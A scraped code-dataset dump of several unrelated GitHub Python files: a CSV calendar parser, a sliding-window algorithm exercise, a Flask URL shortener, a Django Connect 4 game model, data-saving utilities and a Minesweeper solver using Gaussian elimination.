csv.reader(csvDataFile)\n for row in csvReader:\n Subject.append(row[0])\n Startdate.append(row[1])\n Starttime.append(row[2])\n Enddate.append(row[3])\n Endtime.append(row[4])\n Alldayevent.append(row[5])\n Description.append(row[6])\n Location.append(row[7])\n Private.append(row[8])\n return Subject, Startdate, Starttime, Enddate, Endtime, Alldayevent, Description, Location, Private\n\n\n\nprint(Subject)\nprint(Enddate)\n\n# Subject,Start date,Start time,End Date,End Time,All day Event,Description,Location,Private\n# Subject, Startdate, Starttime, Enddate, Endtime, Alldayevent, Description, Location, Private\n# Douglas Manfred Winni Udo ,08.06.2020,11:00:00,08.06.2020,13:00:00,FALSE,Douglas Manfred Winni Udo ,Borkstraße 17 - 48163 Münster,FALSE\n","repo_name":"SunsetGolfer/ConvertCSVFileDateFormat","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"44415376255","text":"#User function Template for python3\n\nclass Solution:\n def smallestSubstring(self, S):\n # Code here\n # maintain a python dictionary to keep count of 0, 1 and 2 => countDict={0:0, 1:0, 2:0}\n dictOf_012Count = {'0': 0, '1':0, '2':0}\n \n def incrementCountOfGivenChar(char012):\n if (char012=='0' or char012=='1' or char012=='2'):\n dictOf_012Count[char012] += 1\n \n def decrementCountOfGivenChar(char012):\n if (char012=='0' or char012=='1' or char012=='2'):\n dictOf_012Count[char012] -= 1 #don't have to worry about -ve count because that will never happen\n \n def has012():#returns True if count of all the 3 chars are atleast 1\n countOf_0 = dictOf_012Count['0']\n countOf_1 = dictOf_012Count['1']\n countOf_2 = dictOf_012Count['2']\n if (countOf_0>0 and countOf_1>0 and countOf_2>0):\n return True\n else:\n return False\n \n # have a windowStart pointer starting at 0 and windowEnd pointer starting at 1\n windowStart = 0\n windowEnd = 0\n minValidWindowLength = -1\n # increment count of 1st character\n incrementCountOfGivenChar(S[0])\n while(windowEnd=len(S):\n break\n #when control reaches here , it is safe to access the string and increment char count\n incrementCountOfGivenChar(S[windowEnd])\n if (has012()==False): \n #if has012() is still False after exiting the above while loop, \n # this means that there is no valid windows anymore\n break\n #when control reaches here the window is valid \n # and it is time to update the minValidWindowLength\n currentValidWindowLength = windowEnd - windowStart + 1\n if minValidWindowLength == -1:\n minValidWindowLength = currentValidWindowLength\n else:\n minValidWindowLength = min(minValidWindowLength,currentValidWindowLength)\n # now shorten the window by increasing start and decrementing the corresponding char from dictionary if 0 , 1 or 2\n decrementCountOfGivenChar(S[windowStart])\n windowStart += 1\n \n return minValidWindowLength\n \n#{ \n# Driver Code Starts\n#Initial Template for Python 3\n\nif __name__ == '__main__':\n\tt=int(input())\n\tfor i in range(t):\n\t\tS = input()\n\t\tob = Solution()\n\t\tans = ob.smallestSubstring(S)\n\t\t\n\t\tprint(ans)\n\n\n\n# } Driver Code Ends","repo_name":"kichopher/my-dsa-practice-log","sub_path":"Smallest window containing 0, 1 and 2 - GFG/smallest-window-containing-0-1-and-2.py","file_name":"smallest-window-containing-0-1-and-2.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33002367908","text":"'''\nService class for URL shortner functionality.\n\n'''\n\nfrom flask_restful import Resource, reqparse\nfrom models.urlmodel import UrlModel\n\nimport random\nimport string\n\n\nclass URLService(Resource):\n '''\n Return the actual URL from the shortest URL provided.\n '''\n def get(self, url_key):\n url_obj = UrlModel.find_by_key(url_key)\n if url_obj:\n location = \"https://\" + url_obj.url if \"https://\" not in url_obj.url else url_obj.url\n return {}, 301, {'location': location}\n return {\"message\": f\"URL not found with key '{url_key}'\"}, 404\n\n\n'''\nGenerate a shorter URL from a long URL and map it in the database.\n'''\nclass URLServiceGenerate(Resource):\n parser = reqparse.RequestParser()\n parser.add_argument('url',\n type=str,\n required=True,\n help=\"URL is Mandatory\"\n )\n '''\n Accept the url in the post body as a JSON data.\n '''\n def post(self):\n payload = URLServiceGenerate.parser.parse_args()\n '''\n if UrlModel.find_by_key(payload['url_key']):\n return {\"message\": \"Duplicate Key Found\"}, 400\n '''\n\n ukey = URLServiceGenerate.generate_random_key()\n\n while(UrlModel.find_by_key(ukey)):\n ukey = URLServiceGenerate.generate_random_key()\n\n url_obj = UrlModel(ukey, payload['url'])\n url_obj.save_to_db()\n\n return {\"shorten_url_key\": url_obj.key}, 201\n\n '''\n Generate a random 8 character string, which will be mapped for an URL. \n '''\n @classmethod\n def generate_random_key(cls):\n letters = string.ascii_letters\n result_str = ''.join(random.choice(letters) for i in range(8))\n return result_str","repo_name":"Biswajit-S/MockServer","sub_path":"mockserver/resources/urlsvc.py","file_name":"urlsvc.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33987252231","text":"\"\"\"\nData types and operations that represent a game of Connect 4.\n\"\"\"\nfrom django.contrib.auth.models import User\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db import models\n\nfrom games.exceptions import GameFull, IllegalMove\n\n\nclass Game(models.Model):\n \"\"\"\n A game of Connect 4.\n \"\"\"\n player1 = models.ForeignKey(User, related_name=\"player1\")\n player2 = models.ForeignKey(User, related_name=\"player2\",\n blank=True, null=True, default=None)\n winner = models.ForeignKey(User, related_name=\"winner\",\n blank=True, null=True, default=None)\n turn = models.ForeignKey(User, related_name=\"turn\",\n blank=True, null=True, default=None)\n stalemate = models.BooleanField(default=False)\n column_count = 7\n row_count = 6\n\n @classmethod\n def new_game(cls, player):\n \"\"\"\n Join a game if there is one available or create one. Leaves any games\n the player is currently in.\n\n :arg player: The user to be placed in a new game.\n :type player: django.contrib.auth.models.User\n\n :returns: The game the player has joined.\n :rtype: Game\n \"\"\"\n current_game = Game.current_game(player)\n if current_game:\n if current_game.player2 is None:\n # If you are in a new game already, do nothing\n return current_game\n current_game.forfeit(player)\n available_games = Game.objects.filter(player2=None)\n if available_games.count():\n try:\n game = available_games[0]\n game.join(player)\n return game\n except GameFull:\n pass\n return cls._create_game(player)\n\n @classmethod\n def current_game(cls, player):\n \"\"\"\n Return current game player is in. If the player is not currently in a\n game, then the most recent game the player was in will be returned. If\n the player has never been in a game, then None is returned.\n\n :arg player: The user to find a game.\n :type player: django.contrib.auth.models.User\n\n :returns: The player's current game.\n :rtype: Game or None\n \"\"\"\n games = Game._get_games(player).order_by(\"-pk\")\n if not games:\n return None\n return games[0]\n\n @classmethod\n def _create_game(cls, player):\n \"\"\"\n Create a new game with player as player1.\n\n :arg player: The first player in the new game.\n :type player: django.contrib.auth.models.User\n\n :returns: The created game.\n :rtype: Game\n \"\"\"\n game = Game.objects.create(player1=player)\n for i in range(cls.column_count):\n col = Column.objects.create(index=i, game=game)\n for j in range(cls.row_count):\n Slot.objects.create(index=j, column=col)\n return game\n\n @classmethod\n def _get_games(cls, player):\n \"\"\"\n Get all games containing a specified player.\n\n :arg player: The player to search for games containing.\n :type player: django.contrib.auth.User\n\n :returns: All games player has been.\n :rtype: Game list\n \"\"\"\n games_as_player1 = cls.objects.filter(player1=player)\n games_as_player2 = cls.objects.filter(player2=player)\n return games_as_player1 | games_as_player2\n\n def forfeit(self, player):\n \"\"\"\n Provided player loses this game. If the game is over, does nothing.\n Assumes that that player is in the game.\n\n :arg player: Forfeiting player\n :arg type: django.contrib.auth.models.User\n\n :returns: None\n :rtype: None\n\n :raises AssertionError: when provided player is not in the game.\n \"\"\"\n if not self.stalemate and not self.winner:\n assert player == self.player1 or player == self.player2\n if self.player1 == player:\n self.winner = self.player2\n else:\n self.winner = self.player1\n self.turn = None\n self.save()\n\n def get_board(self):\n \"\"\"\n Return a 2D array representing the board. Each position on the board is\n either the player who has a token in that position or None for empty\n positions.\n\n :returns: A representation of the board.\n :rtype: List of lists of django.contrib.auth.models.User or None\n \"\"\"\n columns = Column.objects.filter(game=self).order_by(\"index\")\n board = [[None] * Game.column_count for _ in range(Game.row_count)]\n for column in columns:\n for slot in Slot.objects.filter(column=column).order_by(\"index\"):\n board[slot.index][column.index] = slot.player\n return board\n\n def move(self, player, index):\n \"\"\"\n Place a token on the board. The token will fall like in normal connect\n 4. After the move is made, the turn is updated and the board is checked\n for game ending conditions.\n\n :arg player: Player making the move\n :type player: django.contrib.auth.models.User\n :arg index: Index of column to place a token in\n :type index: int\n\n :returns: None\n :rtype: None\n\n :raises IllegalMove: when it is not the turn of the player provided or\n when the column provided does not exist.\n \"\"\"\n if self.turn != player:\n raise IllegalMove(\"It is not your turn.\")\n try:\n column = Column.objects.get(game=self, index=index)\n except ObjectDoesNotExist:\n raise IllegalMove(\"No such column.\")\n slots = Slot.objects.filter(column=column).order_by(\"index\")\n if slots[0].player is not None:\n raise IllegalMove(\"Cannot place token in full column.\")\n i = 0\n while i < Game.row_count and slots[i].player is None:\n i += 1\n slot = slots[i - 1]\n slot.player = player\n slot.save()\n if player == self.player1:\n self.turn = self.player2\n else:\n self.turn = self.player1\n self._check_board()\n\n def join(self, player):\n \"\"\"\n Add player to this game.\n\n :arg player: The player to add to the game.\n :type player: django.contrib.auth.models.User\n\n :returns: None\n :rtype: None\n\n :raises GameFull: if this game already has two players.\n \"\"\"\n if self.player2 is not None:\n raise GameFull(\"There are already 2 players in this game.\")\n self.player2 = player\n self.turn = self.player1\n self.save()\n\n def _check_board(self):\n \"\"\"\n Checks the board for a winner or stalemate and updates the game state.\n\n :returns: None\n :rtype: None\n \"\"\"\n winner = self._check_winner()\n if winner:\n self.winner = winner\n self.turn = None\n else:\n if self._board_is_full():\n self.stalemate = True\n self.turn = None\n self.save()\n\n def _board_is_full(self):\n \"\"\"\n :returns: True if every slot in the board is occupied.\n :rtype: bool\n \"\"\"\n for column in self.get_board():\n for player in column:\n if not player:\n return False\n return True\n\n def _check_winner_in_sequence(self, sequence):\n \"\"\"\n Determine if there is a sequence of 4 tokens from the same player in a\n list.\n \"\"\"\n current_streak = 0\n current_player = None\n for token in sequence:\n if token is not None and token == current_player:\n current_streak += 1\n if current_streak >= 4:\n return current_player\n else:\n current_streak = 1\n current_player = token\n\n def _check_winner(self):\n \"\"\"\n Return the winning player if there is one, else return None.\n \"\"\"\n board = self.get_board()\n\n # Horizontal winning conditions\n for row in board:\n winner = self._check_winner_in_sequence(row)\n if winner:\n return winner\n\n # Vertical winning conditions\n for col_index in range(Game.column_count):\n sequence = []\n for row_index in range(Game.row_count):\n sequence.append(board[row_index][col_index])\n winner = self._check_winner_in_sequence(sequence)\n if winner:\n return winner\n\n # Diagonal down-right winning conditions\n for col_index in range(Game.column_count - 3):\n row_index = 0\n sequence = []\n while col_index < Game.column_count and row_index < Game.row_count:\n sequence.append(board[row_index][col_index])\n row_index += 1\n col_index += 1\n winner = self._check_winner_in_sequence(sequence)\n if winner:\n return winner\n\n for row_index in range(Game.row_count - 3):\n col_index = 0\n sequence = []\n while col_index < Game.column_count and row_index < Game.row_count:\n sequence.append(board[row_index][col_index])\n row_index += 1\n col_index += 1\n winner = self._check_winner_in_sequence(sequence)\n if winner:\n return winner\n\n # Diagonal down-left winning conditions\n for col_index in range(3, Game.column_count):\n row_index = 0\n sequence = []\n while col_index >= 0 and row_index < Game.row_count:\n sequence.append(board[row_index][col_index])\n row_index += 1\n col_index -= 1\n winner = self._check_winner_in_sequence(sequence)\n if winner:\n return winner\n\n for row_index in range(Game.row_count - 3):\n col_index = 6\n sequence = []\n while col_index >= 0 and row_index < Game.row_count:\n sequence.append(board[row_index][col_index])\n row_index += 1\n col_index -= 1\n winner = self._check_winner_in_sequence(sequence)\n if winner:\n return winner\n\n def __unicode__(self):\n board = self.get_board()\n return \"\\n\".join(str(row) for row in board)\n\n\nclass Column(models.Model):\n \"\"\"\n A column in a game.\n \"\"\"\n game = models.ForeignKey(Game)\n index = models.IntegerField()\n\n def __unicode__(self):\n return str(self.index)\n\n\nclass Slot(models.Model):\n \"\"\"\n A slot in a column in a game.\n \"\"\"\n column = models.ForeignKey(Column)\n index = models.IntegerField()\n player = models.ForeignKey(User, blank=True, null=True)\n\n def __unicode__(self):\n return str(self.player)\n","repo_name":"KirstenD/ConnectWithFriends","sub_path":"src/backEnd/games/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2467150238","text":"import feather\nimport deepdish as dd\nfrom contextlib import contextmanager\nimport pickle\n\nimport sys\n\n\nclass SkipWith(Exception):\n pass\n\n\n@contextmanager\ndef skip_run(flag, f):\n \"\"\"To skip a block of code.\n\n Parameters\n ----------\n flag : str\n skip or run.\n\n Returns\n -------\n None\n\n \"\"\"\n @contextmanager\n def check_active():\n deactivated = ['skip']\n p = ColorPrint() # printing options\n if flag in deactivated:\n p.print_skip('{:>12} {:>2} {:>12}'.format(\n 'Skipping the block', '|', f))\n raise SkipWith()\n else:\n p.print_run('{:>12} {:>3} {:>12}'.format('Running the block',\n '|', f))\n yield\n\n try:\n yield check_active\n except SkipWith:\n pass\n\n\nclass ColorPrint:\n @staticmethod\n def print_skip(message, end='\\n'):\n sys.stderr.write('\\x1b[88m' + message.strip() + '\\x1b[0m' + end)\n\n @staticmethod\n def print_run(message, end='\\n'):\n sys.stdout.write('\\x1b[1;32m' + message.strip() + '\\x1b[0m' + end)\n\n @staticmethod\n def print_warn(message, end='\\n'):\n sys.stderr.write('\\x1b[1;33m' + message.strip() + '\\x1b[0m' + end)\n\n\ndef save_with_deepdish(path, dataset, save):\n \"\"\"save the dataset.\n\n Parameters\n ----------\n path : str\n path to save.\n dataset : dataset\n hdf5 dataset.\n save : Bool\n\n \"\"\"\n if save:\n dd.io.save(path, dataset)\n\n return None\n\n\ndef read_with_deepdish(path):\n \"\"\"Read the dataset.\n\n Parameters\n ----------\n path : str\n path to read from.\n\n \"\"\"\n dataset = dd.io.load(path)\n\n return dataset\n\n\ndef save_with_pickle(path, dataframe, save):\n \"\"\"save the dataset.\n\n Parameters\n ----------\n path : str\n path to save.\n dataframe : dict\n dictionary of pandas dataframe to save\n\n save : Bool\n\n \"\"\"\n if save:\n with open(path, 'wb') as f:\n pickle.dump(dataframe, f, pickle.HIGHEST_PROTOCOL)\n\n return None\n\n\ndef save_to_r_dataset(df, path):\n \"\"\"Convert pandas dataframe to r dataframe.\n\n Parameters\n ----------\n df : dataframe\n Pandas dataframe.\n path : str\n Path to save.\n\n Returns\n -------\n None\n Description of returned object.\n\n \"\"\"\n feather.write_dataframe(df, path)\n return None\n","repo_name":"HemuManju/haptic-engagement-eeg","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"70778650653","text":"from Tile import *\nfrom random import randint\nimport time\n\n\nclass Board:\n\n def __init__(self, rows, cols, num_mines):\n self.cols = cols # Number of columns in the game matrix\n self.rows = rows # Number of rows in the game matrix\n self.num_mines = num_mines # Number of mines in the game matrix\n self.is_solved = False # Is the game finished yet?\n\n self.mined = set() # Set of Tile()s from matrix that contain mines\n self.flagged = set() # Set of Tile()s from matrix with flags on them\n self.opened = set() # Set of Tile()s from matrix which are opened\n\n # 2-D array.\n # The minesweeper map/matrix.\n # TODO: Should name be m, M, or matrix\n self.M = [[Tile() for c in range(cols)] for r in range(rows)]\n\n # 2-D array which stores lists. 3-D?\n # At each coordinate (r,c), a list of coordinates is stored.\n # This list contains the coordinates of the 8 tiles around (r,c).\n self.nbds = [[None for c in range(cols)] for r in range(rows)]\n\n self.tracker = list() # keep track of solve processes used, just for fun\n\n ############################## PRINTS ##############################\n\n # Prints complete revealed board on the left,\n # with Xs marking mines, and all numbers including 0s shown.\n # Prints the current state of the board on the right,\n # with #s marking covered tiles, and Fs marking flags. 0s shown as -s.\n # Bombs are not marked. This printing is what a game player would see.\n\n def print(self):\n for r in range(self.rows):\n for c in range(self.cols):\n if self.M[r][c].is_mined:\n print(\"X\", end=' ')\n else:\n print(self.M[r][c].number, end=' ')\n print(\" \", end='')\n for c in range(self.cols):\n if self.M[r][c].is_flagged:\n print(\"F\", end=' ')\n elif self.M[r][c].is_opened:\n if self.M[r][c].is_mined:\n print(\"X\", end=' ')\n elif self.M[r][c].number == 0:\n print(\"-\", end=' ')\n else:\n print(self.M[r][c].number, end=' ')\n else:\n print(\"#\", end=' ')\n print(\"\\n\")\n\n\n # Prints only current state of board using special characters\n # Flag emoijis denote flags, solid squares are covered tiles, and zeroes are empty\n def print_pretty(self):\n for r in range(self.rows):\n for c in range(self.cols):\n if self.M[r][c].is_flagged:\n #print(\"F\", end = ' ')\n print(chr(128681), end=' ') # flag\n elif self.M[r][c].is_opened:\n if self.M[r][c].is_mined:\n print(\"X\", end=' ')\n elif self.M[r][c].number == 0:\n #print(\"-\", end = ' ')\n print(\" \", end=' ')\n else:\n print(self.M[r][c].number, end=' ')\n else:\n # print(\"#\", end=' ')\n print(chr(9608), end=' ') # square\n print(\"\\n\")\n\n ############################## GAME SETUP ##############################\n\n # Stores the neighborhood coordinates of\n # every tile for future lookup\n # Originally had a nbd(r,c) function which would\n # find and return the nbd of a tile. It was used frequently\n # enough that it was beneficial to just store its results.\n def fill_nbds(self):\n for r in range(self.rows):\n for c in range(self.cols):\n n = list()\n for rshift in (-1, 0, 1):\n for cshift in (-1, 0, 1):\n if not (rshift == 0 and cshift == 0):\n srow = r+rshift\n scol = c+cshift\n if (srow >= 0) and (scol >= 0) and (srow < self.rows) and (scol < self.cols):\n n.append([srow, scol])\n self.nbds[r][c] = n\n\n\n # Places the mines at random distinct positions,\n # numbers all the tiles accordingly,\n # then opens the tile at start row/col.\n # Starting tile is guaranteed to be a 0 tile.\n def start(self, row, col):\n self.fill_nbds()\n start_nbd = self.nbds[row][col]\n self.M[row][col].number = 0\n placed_mines = 0\n while placed_mines < self.num_mines:\n r = randint(0, self.rows - 1)\n c = randint(0, self.cols - 1)\n if (not self.M[r][c].is_mined) and ([r, c] not in start_nbd) and ([r, c] != [row, col]):\n self.mine_tile(r, c)\n placed_mines += 1\n for r in range(self.rows):\n for c in range(self.cols):\n nbd_bombs = 0\n if self.M[r][c] not in self.mined:\n n = self.nbds[r][c]\n for coord in n:\n if self.M[coord[0]][coord[1]].is_mined:\n nbd_bombs += 1\n self.M[r][c].number = nbd_bombs\n self.M[r][c].xy = [r, c]\n self.tracker.append(\"start\")\n self.open_tile(row, col)\n\n ############################## TILE CHANGES ##############################\n\n # Opens a tile.\n # Add tile to set of opened tiles.\n # If tile is 0, opens its surroundings like in a regular game.\n # This used to be heavily recursive, but would hit the limit for large maps.\n # I removed calling open_tile() on already opened tiles, and\n # I also chose to open zeroes and their nbds using a queue instead of recursion.\n\n def open_tile(self, row, col):\n if not self.M[row][col].is_opened:\n self.M[row][col].is_opened = True\n tile = self.M[row][col]\n self.opened.add(tile)\n\n if tile.number == 0:\n zeroes = self.nbd_unopened_unflagged(row, col)\n while zeroes:\n z = zeroes.pop(0)\n self.opened.add(self.M[z[0]][z[1]])\n self.M[z[0]][z[1]].is_opened = True\n if self.M[z[0]][z[1]].number == 0:\n n = self.nbd_unopened_unflagged(z[0], z[1])\n for coords in n:\n if (coords not in zeroes):\n zeroes.append(coords)\n\n\n # Mark tile as flagged.\n # Add tile to set of flagged tiles.\n def flag_tile(self, row, col):\n self.M[row][col].is_flagged = True\n self.flagged.add(self.M[row][col])\n\n\n # Set tile as mined.\n # Add tile to set of mine tiles.\n def mine_tile(self, row, col):\n self.M[row][col].is_mined = True\n self.mined.add(self.M[row][col])\n\n ############################## CHECKS ##############################\n\n # Return true and set is_solved to true if board is solved.\n\n def board_check(self):\n if self.flagged != self.mined: # mines unflagged\n return False\n elif self.opened.intersection(self.mined): # opened mines\n return False\n elif len(self.opened) != ((self.rows * self.cols)-self.num_mines): # unopened tiles\n return False\n self.is_solved = True\n return True\n\n\n # Returns true if tile has all its flags\n # and has no covered tiles in radius\n def tile_check(self, row, col):\n if self.tile_flag_check(row, col) and not self.nbd_unopened_unflagged(row, col):\n return True\n return False\n\n\n # returns true if a tile has all its flags\n def tile_flag_check(self, row, col):\n if self.tile_flag_count(row, col) == self.M[row][col].number:\n return True\n return False\n\n\n # returns number of flags in tile's radius\n def tile_flag_count(self, row, col):\n flag_count = 0\n for coords in self.nbds[row][col]:\n if self.M[coords[0]][coords[1]].is_flagged:\n flag_count += 1\n return flag_count\n\n ############################## FETCH ##############################\n\n # Returns a list of the coordinates surrounding a tile\n # which are covered yet not flagged\n\n def nbd_unopened_unflagged(self, row, col):\n result = list()\n for coords in self.nbds[row][col]:\n t = self.M[coords[0]][coords[1]]\n if (not t.is_opened) and (not t.is_flagged):\n result.append(t.xy)\n return result\n\n\n # Returns a list of coordinates of opened number tiles in nbd\n # (border coords in nbd of tile)\n def nbd_numbers(self, row, col):\n result = list()\n if (not self.M[row][col].is_opened) and (not self.M[row][col].is_flagged):\n for coords in self.nbds[row][col]:\n tile = self.M[coords[0]][coords[1]]\n if (tile.is_opened) and (tile.number != 0) and (tile.xy != [row, col]):\n result.append([coords[0], coords[1]])\n return result\n\n\n # Returns list of \"border tile\" coordinates meaning:\n # numbered, nonzero, open tiles\n def border_coords(self):\n result = list()\n for r in range(self.rows):\n for c in range(self.cols):\n tile = self.M[r][c]\n if (tile.is_opened) and (tile.number != 0):\n result.append(tile.xy)\n return result\n\n\n # Returns list of unsolved \"border tile\" coordinates, meaning:\n # numbered, nonzero, opened tiles\n # with unopened, unflagged tiles in their radius\n def border_coords_unsolved(self):\n result = list()\n for coords in self.border_coords():\n if self.nbd_unopened_unflagged(coords[0], coords[1]):\n result.append([coords[0], coords[1]])\n return result\n\n\n # Returns list of coordinates representing\n # the border made up of covered tiles\n def border_coords_covered(self):\n bcc = list()\n for bc in self.border_coords_unsolved():\n for nc in self.nbd_unopened_unflagged(bc[0], bc[1]):\n if nc not in bcc:\n bcc.append(nc)\n return bcc\n\n\n def all_covered(self):\n ac = list()\n for r in range(self.rows):\n for c in range(self.cols):\n if (not self.M[r][c].is_opened) and (not self.M[r][c].is_flagged):\n ac.append([r, c])\n return ac\n\n ############################## SOLVING ##############################\n\n # Simplest form of solving.\n # Returns number of changes it made.\n # If the tile has all its flags, yet still has covered tiles around it,\n # those covered tiles must all be safe. Open them.\n # If the number on a tile is equal to the number of covered tiles around it,\n # those covered tiles must all be flags. Flag them.\n # Repeat monkey() until a repetition finishes without making any changes,\n # meaning monkey() has done all it can.\n # This function originally used recursion, but would hit the recursion limit\n # for reasons I could not discover. It was simplified by using the change count.\n\n def monkey(self, print_progress=False, print_pretty=True, print_delay=1, print_clear=True):\n changes = 0\n prev_changes = -1\n while (changes != prev_changes):\n\n prev_changes = changes\n\n if (print_progress):\n if (print_clear):\n print(chr(27) + \"[2J\") # clear terminal\n else:\n print(chr(27)) # escape character, push old print back\n if (print_pretty):\n self.print_pretty()\n else:\n self.print()\n time.sleep(print_delay)\n\n # if a border tile has all its flags...\n for bcu in self.border_coords_unsolved():\n if self.M[bcu[0]][bcu[1]].number - self.tile_flag_count(bcu[0], bcu[1]) == 0:\n for coords in self.nbd_unopened_unflagged(bcu[0], bcu[1]):\n self.open_tile(coords[0], coords[1])\n changes += 1\n # if a border tile's number == covered tiles in its nbd\n nbd = self.nbd_unopened_unflagged(bcu[0], bcu[1])\n if len(nbd) == self.M[bcu[0]][bcu[1]].number - self.tile_flag_count(bcu[0], bcu[1]):\n for coords in nbd:\n self.flag_tile(coords[0], coords[1])\n changes += 1\n\n # if remaining covered tiles = remaining mines, open them all\n ac = self.all_covered()\n if (len(self.mined) == len(self.flagged)):\n for coords in ac:\n self.tracker.append(\"all_covered\")\n self.open_tile(coords[0], coords[1])\n changes += 1\n if len(ac) == (len(self.mined) - len(self.flagged)):\n for coords in ac:\n self.tracker.append(\"all_covered\")\n self.flag_tile(coords[0], coords[1])\n changes += 1\n\n self.tracker.append(str(\"monkey \"+str(changes)))\n return changes\n\n\n # Place flags based on solutions to a reduced matrix\n # formed from border tiles and the covered tiles around them.\n # like a contraint problem.\n # Returns the number of changes it made.\n def gauss(self):\n # for example: in a simple board 1 2 x\n # where x represents a covered tile: x 2 1\n # The matrix row representing the bottom \"2\" should be: \n # 1x_1 + 1x_2 = 2 --> 1 1 2.\n # The matrix row representing the left \"1\" should be \n # 1x_1 + 0x_2 = 1 --> 1 0 1.\n # as x_2 is not in this \"1\"'s radius, \n # it doesn't contribute to the \"1\" tile's value.\n # x values can be either a 1 or a 0 -- a mine or a safe tile.\n g = []\n bcs_covered = self.border_coords_covered() # covered tiles on border\n for bc in self.border_coords_unsolved(): # unfinished opened tiles on border\n row = [0 for _ in range(len(bcs_covered)+1)]\n row[-1] = self.M[bc[0]][bc[1]].number - \\\n self.tile_flag_count(bc[0], bc[1]) # tile value at end of row\n bc_nbd = self.nbd_unopened_unflagged(bc[0], bc[1])\n for i in range(len(bcs_covered)):\n if bcs_covered[i] in bc_nbd:\n row[i] = 1\n g.append(row)\n\n # Reduce matrix into reduced row echelon form.\n # This can be interpreted to determine where to put flags.\n # For example, a row \"0 1 0 0 1\" tells us that x_2 would be a 1/mine,\n # as x_2=1 is the only solution to 0x_1 + 1x_2 + 0x_3 + 0x_4 = 1.\n # Similarly, a row 1 0 -1 1 tells us that x_1 is a mine and x_3 is clear,\n # as x_1=1 x_3=0 is the only solution to 1x_1 + 0x_2 + -1x_3 = 1.\n # And so on.\n # Based on pseudocode from Wikipedia.\n try:\n lead_var = 0 # lead variable is first nonzero value in row when in RREF\n g_rows = len(g)\n g_cols = len(g[0])\n\n for r in range(g_rows):\n if g_cols <= lead_var:\n raise Exception # stop\n i = r\n while g[i][lead_var] == 0: # move forward until first nonzero entry in row\n i += 1\n if g_rows == i:\n i = r\n lead_var += 1\n if g_cols == lead_var: # went through whole row\n raise Exception # stop\n\n # switch row with found i row\n temp = g[r]\n g[r] = g[i]\n g[i] = temp\n\n # if lead nonzero (so, if row is nonzero)\n if g[r][lead_var] != 0:\n div = g[r][lead_var] # divide row by lead value\n for j in range(len(g[r])):\n g[r][j] = g[r][j] / div\n\n for i in range(g_rows):\n if i != r:\n sub = g[i][lead_var] # subtract lead*g[r][j] from row\n for j in range(len(g[i])):\n g[i][j] = g[i][j] - (sub * g[r][j])\n\n lead_var += 1\n except Exception: # if we hit a \"stop\" in the reduction algorithm\n pass\n\n mines = list()\n clear = list()\n for row in g: # make a list of the nonzero elements of the list\n coeffs = list()\n coeff_indices = list()\n value = row[-1] # last value in row\n for i in range(len(row[:-1])):\n if abs(row[i]) > 0:\n coeffs.append(row[i])\n coeff_indices.append(i)\n\n # comparing the sum of pos/neg coeffs to the value at end of row\n # is easier than considering each coeff individually\n # If either of pos/neg coeffs add up to value at end of row,\n # those pos/neg coeffs must be mines (x=1) and the neg/pos coeffs must be clear (x=1).\n sum_pos = 0 # sum positive coefficients\n sum_neg = 0 # sum negative coefficients\n for c in coeffs: # find sums\n if c > 0:\n sum_pos += c\n if c < 0:\n sum_neg += c\n if value == sum_pos: # if positive coeffs add up to row value,\n # look at spaces in row instead of coeffs, so we can \"map\" to bcs_covered\n for r in range(len(row)-1):\n if row[r] > 0: # pos coeffs represent bomb tiles\n mines.append(bcs_covered[r])\n if row[r] < 0: # neg coeffs represent clear tiles\n clear.append(bcs_covered[r])\n if value == sum_neg: # vice versa\n for r in range(len(row)-1):\n if row[r] < 0:\n mines.append(bcs_covered[r])\n if row[r] > 0:\n clear.append(bcs_covered[r])\n '''newmines = list() # make mines list all entries in mines that aren't in not_mines\n for b in mines: # maybe this step can be eliminated?\n if b not in clear:\n newmines.append(b)\n mines = newmines'''\n\n for bc in mines: # flag all the coords the process determined belong to mines\n self.flag_tile(bc[0], bc[1])\n\n self.tracker.append(str(\"gauss \" + str(len(mines))))\n return len(mines)\n\n\n # Runs monkey/gauss until they are no longer changing the board.\n # Returns the time it took to run (including printing progress)\n def driver(self, print_progress=False, print_pretty=True, print_delay=1, print_clear=True):\n start_time = time.time()\n changes = 0\n prev_changes = -1\n while (changes != prev_changes):\n prev_changes = changes\n changes += self.monkey(print_progress,\n print_pretty, print_delay, print_clear)\n # print(\"to_gauss\")\n # time.sleep(.25)\n changes += self.gauss()\n\n exploration = 100 * \\\n (1-(len(self.all_covered()) / (self.rows * self.cols)))\n endappend = list()\n if exploration == 100:\n endappend.append(\"Won\")\n else:\n endappend.append(\"Lost\")\n\n endappend.append(exploration)\n endappend.append(str(len(self.flagged)) + \"/\" + str(len(self.mined)))\n endappend.append(exploration)\n endappend.append(time.time()-start_time)\n self.tracker.append(endappend)\n return self.tracker\n\n # TODO: brute force border combinations?\n # TODO: generate all possible boards for brute force?\n # TODO: guessing?\n","repo_name":"jmfinerty/Minesweeper-Solver","sub_path":"Board.py","file_name":"Board.py","file_ext":"py","file_size_in_byte":19984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4645310489","text":"sent = input(\"Napiste vetu: \")\n\npole1=[]\npole2=[]\npole3=[]\npole4=[]\n\ncisla= 0\nspoluhlasky= 0\nsamohlasky= 0\nostatne=0\nfor i in sent:\n if i in \"1234567890\" :\n cisla = cisla+1\n pole1.append(i)\n elif i in \" aeiouäáéíóúiaieiuôAEIOUÁÉÍÓÚ\" :\n samohlasky = samohlasky +1\n pole2.append(i)\n elif i in \"bcčdďdzdžfghchjklľĺmnňpqrŕsštťvwxzžBCČDĎFGHJKLĽMNŇPRSŠTŤVWXZŽ\" :\n spoluhlasky = spoluhlasky +1\n pole3.append(i)\n else:\n ostatne = ostatne +1\n pole4.append(i)\n\nprint(f\"Počet čísel: 